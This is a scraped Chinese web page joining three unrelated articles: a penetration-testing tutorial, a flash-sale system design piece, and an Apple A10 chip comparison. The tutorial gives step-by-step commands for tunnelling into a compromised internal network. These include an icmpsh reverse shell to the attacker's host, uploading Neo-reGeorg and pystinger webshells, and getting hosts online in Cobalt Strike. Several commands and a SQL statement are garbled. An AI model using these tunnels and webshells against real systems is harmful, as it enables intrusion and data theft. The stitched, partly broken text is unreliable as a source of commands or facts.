内网穿透以后访问主机数据库?内网渗透之主机出网OR不出网隧道搭建
【菜科解读】
当拿到权限之后,做完本地信息收集,最重要的就是做个隧道,对内网进行下一步攻击,这里简单介绍几个常用的工具,主要针对于出网和不出网两种情况。
出网情况
拿到服务器权限之后,遇见这种机器,十分简单,针对不同情况搭建不同隧道,为了速度可以建立sockets隧道、为了隐蔽可以使用dns隧道、icmp隧道等,本文简单介绍几个常用工具。
frp
frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。
可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。
项目地址:https://github.com/fatedier/frp/
下载之后,我们只需要关注四个文件即可:
frps
frps.ini
frpc
frpc.ini
修改frpc.ini,这里搭建sockets隧道,上传至目标服务器启动即可。
./frpc-cfrpc.ini
服务端根据frps.ini修改端口
启动监听
./frps-cfrps.ini
即可建立sockets隧道,利用Proxifierprox等,即可全局代理隧道,访问目标主机内网。
dns
这个比较麻烦需要准备一个域名,和一台DNS服务器,在域名解析添加一条NS记录和一条A记录。
举个例子,域名是123.com,添加一个子域名a.123.com,且类型为NS,并将NS记录指向b.123.com,然后将b.123.com建立A记录服务器IP即可,利用的工具也很多,本文简单介绍dns2tcp。
a.123.comNSb.123.com b.123.comA1.1.1.1
项目地址:https://github.com/HEYAHONG/dns2tcp
客户端
dns2tcpc-rnc-za.123.com1.1.1.1-l8888-d2 -r后接服务名称任意换,本文用nc -z后接NS记录的网址 -l后接本地端口
服务端
修改dns2tcpd.conf,
listen=0.0.0.0 port=53 user=root chroot=http://www.studyofnet.com/home/ domain=a.123.com key=123 resources=ssh:127.0.0.1:22,smtp:127.0.0.1:25,socks:127.0.0.1:1080,http:127.0.0.1:80,https:127.0.0.1:8080
然后执行,dns隧道就搭建好了,利用nc进行传输文件即可。
dns2tcpd-F-d3-f/home/dns2tcpd.conf
建立传输
目标主机监听并接受文件即可。
icmp
icmp隧道主要因为大部分防火墙不会屏蔽 ping ,所以可以将流量封装在icmp进行传输,这种速度跟sockets相比太慢了,特殊情况才会使用。
项目地址:https://github.com/inquisb/icmpsh
服务端:
python icmpsh_m.py ip 目标ip
目标机
icmpsh.exe-t目标ip
即可反弹icmp隧道shell回来。
不出网情况
拿到服务器权限之后,遇见这种机器,只能利用基于webshell的代理,只需要将webshell上传到目标主机即可,然后建立tcp连接,主要利用session来识别不同的的tcp连接,我们攻击监听tcp,将数据post提交到webshell即可进行传输,本文简单介绍两个常用的。
Neo-reGeorg
Neo-reGeorg相当于是 reGeorg的升级版,有了更强的隐蔽性,原理都是相同的,常用于webshell代理流量,进而进行内网渗透。
项目地址:https://github.com/L-codes/Neo-reGeorg
首先需要设置密码,生成各种类型webshell,并上传至目标服务器
pythonneoreg.pygenerate-kpassword
上传至服务器即可,然后启动监听即可
pythonneoreg.py-kpassword-u
最后挂上sockets代理即可访问内网。
pystinger
毒刺(pystinger)通过webshell实现内网socks4代理,并且可以利用pystinge实现各种cs\msf上线,目前仅支持php、jsp(x)、aspx.
项目地址:https://github.com/FunnyWolf/pystinger
这个工具比较强大,这里可以直接上线cs,简单介绍如何搭建socks4以及cs上线。
socks4隧道搭建:
首先上传proxy.php,然后上传stinger_server.exe 到目标服务器,并start命令运行该程序
最后在我们的服务器执行
./stinger_client-w
即可建立socks4隧道,利用Proxifierprox等,访问目标主机内网。
cs上线:
前面大体相同,首先上传proxy.php,然后上传stinger_server.exe 到目标服务器,启动利用冰蝎start启动即可
我们的服务器也需要进行监听
./stinger_client-w
然后cs进行监听,端口填写60020
#p#分页标题#e#
进而利用cs生成powershell
执行可以利用pystinger,进行不出网主机上线。
End
这里只是抛砖引玉,引出一些在之前工作中针对于不出网以及出网主机,用过最多的几个隧道代理工具,还请各位大佬勿喷,有更好的工具多补充,共同交流,这样我们才能共同成长,格拉德威尔曾说过:“人们眼中的天才之所以卓越非凡,并非天资超人一等,而是付出了持续不断的努力。
1万小时的锤炼是任何人从平凡变成世界级大师的必要条件“。
秒杀的原理和开发思路?软件架构
发现性能的瓶颈更好的调优。
还会说说高阶的优化。
主要分享给大家针对互联网分布式的高并发项目怎么去调优,快速定位,快速解决。
主要说思路,明白了思路,如何去快速定位,快速解决。
常用的调优方案。
秒杀系统介绍 其实大家都经常在网上购物的,秒杀应该都知道套路吧。
所谓“秒杀”,就是网络卖家发布一些超低价格的商品,所有买家在同一时间网上抢购的一种销售方式。
特点-低价,少量库存,疯抢。
吸引大家来抢购,也不至于自己亏的太多。
博眼球。
高并发,大流量。
念得出名字的互联网公司基本都是高并发,大流量。
双十一秒杀系统实现介绍。
1.通过原有的下单增加三个变量完成,是否秒杀,开始时间,结束时间。
2.是否秒杀,是为了商品的展示。
如果是秒杀商品的特殊判断。
3.进入页面之前先进入controller获取一个当前的后台时间传递到前台,方便读秒。
4.前端js判断时间到达后进行下单,下单时传递时间跟后端时间进行对比,防止被高手修改时间强行下单。
5.对于库存是通过下单的时间来判断的,必须按照秒杀开始后的时间来进行判断,每次下单库存都需要进行判断,防止超卖。
sql上边的判断: update t_product set 库存=库存-1 and 商品id="ID号" and 库存>0;数据库防止绝对超卖。
6.忘了说了,必须判断登录,防止某个账号恶意刷接口。
压测 我砖都搬完了,自己点点没问题了,还压测个毛线啊,压测都是测试人员的事情,我开发任务都堆成山了。
1.老铁啊,老铁,压测其实很有必要,jmeter分分钟就压测了接口。
2.压测可以让自己不被坑,压测还可以发现bug。
3.压测可以让你的代码更健壮。
4.压测可以找到业务和功能的bug。
如果测试出来你的bug,可能罚钱,影响钱的问题。
了解几个技术点1.tps。
t代表英文的事务。
2.qps。
q代表查询。
QPS Queries Per Second意思是“每秒查询率”,是一台服务器每秒能够相应的查询次数,是对一个特定的查询服务器在规定时间内所处理流量多少的衡量标准。
TPS TransactionsPerSecond的缩写,也就是事务数/秒。
它是软件测试结果的测量单位。
一个事务是指一个客户机向服务器发送请求然后服务器做出反应的过程。
客户机在发送请求时开始计时,收到服务器响应后结束计时,以此来计算使用的时间和完成的事务个数。
PS:熟悉秒杀的原理,秒杀的开发思路,最好会用jmeter可以自己做做简单的压测。
苹果a10处理器有哪些机型?苹果a10和麒麟骁龙哪个好
下面,我们将为您分享详细内容。
A10 Fusion详细参数我们先说一下苹果A10处理器的详细参数:A10 Fusion 芯片是苹果公司在2016年发布的旗舰级处理器芯片,搭载在iPhone7系手机上,其CPU方面采用2大2小四核心配置,GPU方面则采用了六核心图形处理芯片(苹果的自家GPU核心),基于台积电的16nm工艺制程,拥有33亿个晶体管(作为比较 麒麟980是69亿晶体管),总的来说单从制程工艺和晶体管数量来说,A10的性能应当和目前安卓阵营的中端处理器类似。
苹果a10处理器有哪些机型iPhone7、iPhone7plus有哪些平板支持A10呢?好像目前还没有发布,如果发布的话有可能2款,分别是:1、iPad mini5: A9处理器/2G内存,其他不变;2、iPad Pro9.7: A10X处理器/4G内存;3、iPad Air3: A9X或者A10处理器/2G内存。
苹果a10和麒麟骁龙哪个好麒麟970、骁龙835都要胜A10一筹。
麒麟810更比A10强一头,骁龙845又比A10在多核性能方面更出众;总觉得A10似乎要被麒麟和骁龙给按在地上摩擦了。
事实上,真的如此吗?带着这个疑问,我们开始今天的研究。
单核性能的A10我们尽量的不用安兔兔进行跑分,毕竟安卓手机和iPhone手机不是在一个赛道上跑出的成绩,我们使用的是geekbench的跑分,,单核跑分上达到了3328分;在多核跑分上,达到了6036分。
我们如果单纯的看这个跑分,已经会发现一些端倪。
在单核方面,骁龙855的单核性能和A10是类似的:麒麟980的单核性能和A10也是类似的:我们可以得出结论:在单核性能方面,苹果确实发挥了处理器的优势,在性能方面,直接可以怒怼麒麟980和骁龙855处理器;可是,你要注意一点,虽然A10在多核性能方面,可能就和骁龙660这样的机型类似,可是你要知道,A10使用的是4核心处理器,在A11这款使用了6核心的处理器中,性能堪比麒麟980和骁龙855.这么比较靠谱吗?我们比较的是单核心的性能,对于手机而言,实际上是不靠谱的,菜叶说说,我们实际使用中,处理器确实有用,可是不能作为评判我们手机性能的唯一标准,我们在选择手机的时候,更应该关注度的是,在系统和处理器的通力合作下,怎么能够保证手机的整体性能和流畅性,而一味的追求单核或者多核性能,是有点本木倒置了,iPhone强就在于,它不是将跑分作为评价的标准,它的厉害之处,是我们在使用的时候,也能感觉到流畅的性能。
所以,A10的性能,你说和现在的旗舰安卓机比较也行;说它不及目前中端处理器的安卓机也行,它就在那里,从不参与比较。
